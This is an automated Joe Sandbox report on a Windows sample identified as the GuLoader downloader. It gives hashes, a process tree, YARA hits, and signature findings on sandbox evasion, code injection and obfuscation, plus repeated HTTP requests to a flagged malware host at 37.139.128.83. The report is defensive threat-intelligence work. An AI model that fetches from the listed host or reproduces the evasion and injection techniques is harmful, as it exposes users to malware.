Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.exe

Overview

General Information

Sample Name:download.exe
Analysis ID:830512
MD5:064fa36da0c2ca360b0906cc5bfe67c6
SHA1:a6623c33cbd86bdaee063f897bea1692621494e5
SHA256:6974c5051372213d0e90147660c4b21bfff238e20c6449acb19f1901bf4729c8
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected GuLoader
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • download.exe (PID: 8540 cmdline: C:\Users\user\Desktop\download.exe MD5: 064FA36DA0C2CA360B0906CC5BFE67C6)
    • CasPol.exe (PID: 924 cmdline: C:\Users\user\Desktop\download.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
      • conhost.exe (PID: 4728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1798739196.0000000000B02000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
    00000004.00000002.5807012371.00000000025EF000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000002.00000002.1806817167.00000000069EF000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: download.exe PID: 8540JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://37.139.128.83/2-2Avira URL Cloud: Label: malware
          Source: http://37.139.128.83/2kAvira URL Cloud: Label: malware
          Source: http://37.139.128.83/2Avira URL Cloud: Label: malware
          Source: http://37.139.128.83/2DataAvira URL Cloud: Label: malware
          Source: http://37.139.128.83/2MAvira URL Cloud: Label: malware
          Source: http://37.139.128.83/2W7Avira URL Cloud: Label: malware
          Source: http://37.139.128.83/2R2Avira URL Cloud: Label: malware
          Source: http://37.139.128.83/2eAvira URL Cloud: Label: malware
          Source: http://37.139.128.83/lAvira URL Cloud: Label: malware
          Source: http://37.139.128.83/2gsLMEM8Avira URL Cloud: Label: malware
          Source: http://37.139.128.83/2$2Avira URL Cloud: Label: malware
          Source: http://37.139.128.83/262hkAvira URL Cloud: Label: malware
          Source: download.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: download.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_00405745 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_00405745
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004026FE FindFirstFileA,2_2_004026FE
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_00406280 FindFirstFileA,FindClose,2_2_00406280
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:16:46 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:16:56 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:17:07 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:17:17 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:17:27 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:17:37 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:17:47 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:17:57 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
